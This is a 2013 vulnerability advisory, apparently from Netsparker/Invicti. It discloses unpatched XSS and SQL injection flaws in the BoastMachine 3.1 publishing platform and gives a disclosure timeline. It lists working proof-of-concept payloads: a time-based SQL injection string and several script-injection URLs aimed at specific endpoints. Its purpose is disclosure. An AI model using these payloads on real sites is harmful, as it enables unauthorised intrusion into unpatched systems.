XSS and SQL Injection Vulnerabilities in BoastMachine
Information
Advisory by Netsparker (now Invicti)
Name: XSS and SQL Injection Vulnerabilities in BoastMachine
Software: BoastMachine 3.1 and possibly below.
Vendor Homepage: https://github.com/knadh/boastmachine
Vulnerability Type: Cross-Site Scripting and SQL Injection
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-13-014
Description
boastMachine is an open source, state of the art publishing platform that makes your web publishing experience so fun and easy as never before! From the fully automated installation to advanced content management features to spam fighting, boastMachine provides you with all that you would ever need!
Details
BoastMachine is affected by XSS and SQL Injection vulnerabilities in version 3.1.
Example PoC urls are as follows:
- SQL Injection Vulnerabilities
http://example.com/user.php
(POST – blog)blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
- XSS Vulnerabilities
http://example.com/index.php
(POST – params: key, blog)http://example.com/bmc/wysiwyg/?form=newpost&box='"--></style></script><script>alert(0x000336)</script>
http://example.com/bmc/wysiwyg/?form='"--></style></script><script>alert(0x000335)</script>&box=3
http://example.com/user.php?action=new_post&blog='"--></style></script><script>alert(0x0000F8)</script>
http://example.com/bmc/admin/?action=list_users&blog='"--></style></script><script>alert(0x0008FF)</script>
http://example.com/bmc/admin.php?blog='"--></style></script><script>alert(0x0002B5)</script>&action=del_blog&step=1
http://example.com/user.php
(POST – params: blog)
Learn more about Cross-Site Scripting and SQL Injection vulnerabilities:
Solution
No patch released.
Advisory Timeline
10/07/2013 – First Contact – No Response
24/07/2013 – Second Contact – No response
10/12/2013 – Vulnerability Released
Credits
It has been discovered on testing of Invicti Web Application Security Scanner.
About Invicti
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.